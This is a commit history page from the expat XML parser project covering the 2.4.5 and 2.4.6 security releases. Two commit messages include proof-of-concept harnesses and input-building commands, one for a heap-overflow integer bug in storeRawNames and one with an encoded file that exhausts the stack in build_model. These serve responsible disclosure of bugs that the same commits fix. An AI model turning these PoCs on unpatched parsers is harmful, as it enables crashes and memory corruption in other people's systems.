Commit Graph

3507 Commits

Author SHA1 Message Date
Sebastian Pipping
9579f7ea29 Changes: Document #572 and #577 2022-03-04 16:56:22 +01:00
Sebastian Pipping
c57bea96b7 lib|doc: Add a note on namespace URI validation 2022-03-04 16:56:22 +01:00
Sebastian Pipping
5dd5218297 lib: Document namespace separator effect right in header <expat.h> 2022-03-04 16:54:01 +01:00
Sebastian Pipping
e0f852db1e tests: Cover relaxed fix to CVE-2022-25236 2022-03-04 16:54:01 +01:00
Sebastian Pipping
2ba6c76fca lib: Relax fix to CVE-2022-25236 with regard to RFC 3986 URI characters 2022-03-04 16:54:01 +01:00
Sebastian Pipping
c99e0e7f2b
Merge pull request #579 from Tieske/patch-1
doc: Fix documentation of XML_EndDoctypeDeclHandler in <expat.h>
2022-03-04 16:46:36 +01:00
Thijs Schreijer
7abe5549cb
fix typo
This has already been corrected in the official API reference docs
2022-03-04 11:24:31 +01:00
Thijs Schreijer
80553ff825
doc: Document that a call to XML_FreeContentModel can be done at a later time from outside the element declaration handler (#575) 2022-03-02 21:33:54 +01:00
Sebastian Pipping
866a8617e4
Merge pull request #574 from libexpat/hardcoded-namespace-uri-findability
lib: Make hardcoded namespace URIs easier to find
2022-02-27 03:49:16 +01:00
Sebastian Pipping
92527164e7 lib: Make hardcoded namespace URIs easier to find 2022-02-27 02:42:54 +01:00
Jeffrey Walton
8c4b3aa16f
Update documentation on use of XML_POOR_ENTOPY on Solaris (#573) 2022-02-26 22:00:16 +01:00
Sebastian Pipping
6aa6a82d24
Merge pull request #570 from petitlapin/dll_info
CMake/Windows: store Expat version in the dll
2022-02-24 23:09:09 +01:00
Johnny Jazeix
f294837733 CMake/Windows: store Expat version in the dll
Fixes #555

Tested with msvc2019 and mingw8.1
2022-02-24 22:26:40 +01:00
Sebastian Pipping
ce08faf294
Merge pull request #571 from libexpat/issue-569-resolve-use-of-macros-nan-and-infinity
tests: Resolve use of macros NAN and INFINITY for GNU G++ 4.8.2 (fixes #569)
2022-02-24 00:34:52 +01:00
Sebastian Pipping
f6f5d9bb4c tests: Resolve use of macros NAN and INFINITY for GNU G++ 4.8.2 2022-02-23 22:58:36 +01:00
Sebastian Pipping
65a21f2b2a
Merge pull request #568 from libexpat/issue-567-prepare-release
Prepare release 2.4.6 (part of #567)
2022-02-20 18:01:38 +01:00
Sebastian Pipping
400e6955ff Set expected release date for 2.4.6 2022-02-20 16:09:26 +01:00
Sebastian Pipping
28f74546b4 Bump version to 2.4.6 2022-02-20 16:09:26 +01:00
Sebastian Pipping
45732df416 Bump version info from 9:5:8 to 9:6:8
See https://verbump.de/ for what these numbers do
2022-02-20 16:09:26 +01:00
Sebastian Pipping
49abcfba57 Changes: Finalize entry on #566 2022-02-20 16:09:22 +01:00
Sebastian Pipping
9288cd5474
Merge pull request #566 from ferivoz/model-regression
Fix build_model regression
2022-02-20 15:57:54 +01:00
Sebastian Pipping
2722201a5b Changes: Document regression from CVE-2022-25313 fix 2022-02-20 11:55:54 +00:00
Sebastian Pipping
154e565f6e tests: Protect against nested element declaration model regressions 2022-02-20 11:55:49 +00:00
Samanta Navarro
b12f34fe32 Fix build_model regression.
The iterative approach in build_model failed to fill children arrays
correctly. A preorder traversal is not required and turned out to be the
culprit. Use an easier algorithm:

Add nodes from scaffold tree starting at index 0 (root) to the target
array whenever children are encountered. This ensures that children
are adjacent to each other. This complies with the recursive version.

Store only the scaffold index in numchildren field to prevent a direct
processing of these children, which would require a recursive solution.
This allows the algorithm to iterate through the target array from start
to end without jumping back and forth, converting on the fly.

Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
2022-02-20 11:55:46 +00:00
Sebastian Pipping
97a4840578
Merge pull request #564 from libexpat/issue-557-prepare-release
Prepare release 2.4.5 (part of #557)
2022-02-18 23:39:29 +01:00
Sebastian Pipping
bacd815ed0 Set expected release date for 2.4.5 2022-02-18 20:17:17 +01:00
Sebastian Pipping
fdbd69b12c Sync file headers 2022-02-18 20:17:16 +01:00
Sebastian Pipping
fa379d65dd Bump version to 2.4.5 2022-02-18 20:17:16 +01:00
Sebastian Pipping
748c618f72 Bump version info from 9:4:8 to 9:5:8
See https://verbump.de/ for what these numbers do
2022-02-18 20:14:29 +01:00
Sebastian Pipping
e2d43320ce Changes: Document #558 #559 #560 2022-02-18 20:14:29 +01:00
Sebastian Pipping
306b72134f
Merge pull request #562 from libexpat/utf8-security
[CVE-2022-25235] lib: Protect against malformed encoding (e.g. malformed UTF-8)
2022-02-18 20:12:32 +01:00
Sebastian Pipping
c16300f0bc Changes: Document CVE-2022-25235 2022-02-18 18:04:27 +01:00
Sebastian Pipping
6a5510bc6b tests: Cover missing validation of encoding (CVE-2022-25235) 2022-02-18 18:02:19 +01:00
Sebastian Pipping
c85a3025e7 lib: Add comments to BT_LEAD* cases where encoding has already been validated 2022-02-18 18:02:19 +01:00
Sebastian Pipping
3f0a0cb644 lib: Add missing validation of encoding (CVE-2022-25235) 2022-02-18 18:02:19 +01:00
Sebastian Pipping
ee2a5b50e7 lib: Drop unused macro UTF8_GET_NAMING 2022-02-18 18:02:19 +01:00
Sebastian Pipping
2cc97e875e
Merge pull request #561 from libexpat/namesep-security
[CVE-2022-25236] lib: Protect against insertion of namesep characters into namespace URIs
2022-02-18 18:01:27 +01:00
Sebastian Pipping
d477fdd284
Merge pull request #560 from ferivoz/copy
[CVE-2022-25314] lib: Prevent integer overflow in copyString
2022-02-18 18:00:46 +01:00
Sebastian Pipping
89214940ef
Merge pull request #559 from ferivoz/rawnames
[CVE-2022-25315] lib: Prevent integer overflow in storeRawNames
2022-02-18 18:00:24 +01:00
Sebastian Pipping
bbdfcfef47
Merge pull request #558 from ferivoz/model
[CVE-2022-25313] lib: Prevent stack exhaustion in build_model
2022-02-18 17:59:50 +01:00
Sebastian Pipping
e4d7e49782 Changes: Document CVE-2022-25236 2022-02-16 02:07:31 +01:00
Sebastian Pipping
2de077423f tests: Cover CVE-2022-25236 2022-02-16 02:07:31 +01:00
Sebastian Pipping
a2fe525e66 lib: Protect against malicious namespace declarations (CVE-2022-25236) 2022-02-16 02:07:19 +01:00
Sebastian Pipping
6881a4fc85 lib: Fix (harmless) use of uninitialized memory 2022-02-16 02:06:23 +01:00
Sebastian Pipping
f1a444ef64
Merge pull request #563 from libexpat/extend-mailmap
Extend .mailmap
2022-02-15 22:43:52 +01:00
Sebastian Pipping
317c91776a Sync file headers 2022-02-15 21:23:29 +01:00
Sebastian Pipping
68ed0d7e63 Extend .mailmap 2022-02-15 21:23:25 +01:00
Samanta Navarro
eb0362808b Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.

The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.

Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.

Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counter-parts.

The proof of concept works by taking these three considerations into
account:

1. Move the m_buffer size slightly below a power of two by having a
   short root node <a>. This allows the m_buffer to grow very close
   to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
   INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
   limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
   which only contains ASCII characters. UTF-16 always stores two
   bytes per character while the tag name is converted to using only
   one. Our attack node byte count must be a bit higher than
   2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
   in sum can overflow INT_MAX.

Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.

Proof of Concept:

1. Compile expat with -fsanitize=address.

2. Create Proof of Concept binary which iterates through input
   file 16 MB at once for better performance and easier integer
   calculations:

```
cat > poc.c << EOF
 #include <err.h>
 #include <expat.h>
 #include <stdlib.h>
 #include <stdio.h>

 #define CHUNK (16 * 1024 * 1024)
 int main(int argc, char *argv[]) {
   XML_Parser parser;
   FILE *fp;
   char *buf;
   int i;

   if (argc != 2)
     errx(1, "usage: poc file.xml");
   if ((parser = XML_ParserCreate(NULL)) == NULL)
     errx(1, "failed to create expat parser");
   if ((fp = fopen(argv[1], "r")) == NULL) {
     XML_ParserFree(parser);
     err(1, "failed to open file");
   }
   if ((buf = malloc(CHUNK)) == NULL) {
     fclose(fp);
     XML_ParserFree(parser);
     err(1, "failed to allocate buffer");
   }
   i = 0;
   while (fread(buf, CHUNK, 1, fp) == 1) {
     printf("iteration %d: XML_Parse returns %d\n", ++i,
       XML_Parse(parser, buf, CHUNK, XML_FALSE));
   }
   free(buf);
   fclose(fp);
   XML_ParserFree(parser);
   return 0;
 }
EOF
gcc -fsanitize=address -lexpat -o poc poc.c
```

3. Construct specially prepared UTF-16 XML file:

```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```

4. Run proof of concept:

```
./poc poc-utf16.xml
```
2022-02-15 12:17:18 +00:00
Samanta Navarro
efcb347440 Prevent integer overflow in copyString
The copyString function is only used for encoding string supplied by
the library user.
2022-02-15 12:16:57 +00:00
Samanta Navarro
9b4ce651b2 Prevent stack exhaustion in build_model
It is possible to trigger stack exhaustion in build_model function if
depth of nested children in DTD element is large enough. This happens
because build_node is a recursively called function within build_model.

The code has been adjusted to run iteratively. It uses the already
allocated heap space as temporary stack (growing from top to bottom).

Output is identical to recursive version. No new fields in data
structures were added, i.e. it keeps full API and ABI compatibility.
Instead the numchildren variable is used to temporarily keep the
index of items (uint vs int).

Documentation and readability improvements kindly added by Sebastian.

Proof of Concept:

1. Compile poc binary which parses XML file line by line

```
cat > poc.c << EOF
 #include <err.h>
 #include <expat.h>
 #include <stdio.h>

 XML_Parser parser;

 static void XMLCALL
 dummy_element_decl_handler(void *userData, const XML_Char *name,
                            XML_Content *model) {
   XML_FreeContentModel(parser, model);
 }

 int main(int argc, char *argv[]) {
   FILE *fp;
   char *p = NULL;
   size_t s = 0;
   ssize_t l;
   if (argc != 2)
     errx(1, "usage: poc poc.xml");
   if ((parser = XML_ParserCreate(NULL)) == NULL)
     errx(1, "XML_ParserCreate");
   XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
   if ((fp = fopen(argv[1], "r")) == NULL)
     err(1, "fopen");
   while ((l = getline(&p, &s, fp)) > 0)
     if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
       errx(1, "XML_Parse");
   XML_ParserFree(parser);
   free(p);
   fclose(fp);
   return 0;
 }
EOF
cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
```

2. Create XML file with a lot of nested groups in DTD element

```
cat > poc.xml.zst.b64 << EOF
KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
EOF
base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
```

3. Run Proof of Concept

```
./poc poc.xml
```

Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
2022-02-15 12:16:23 +00:00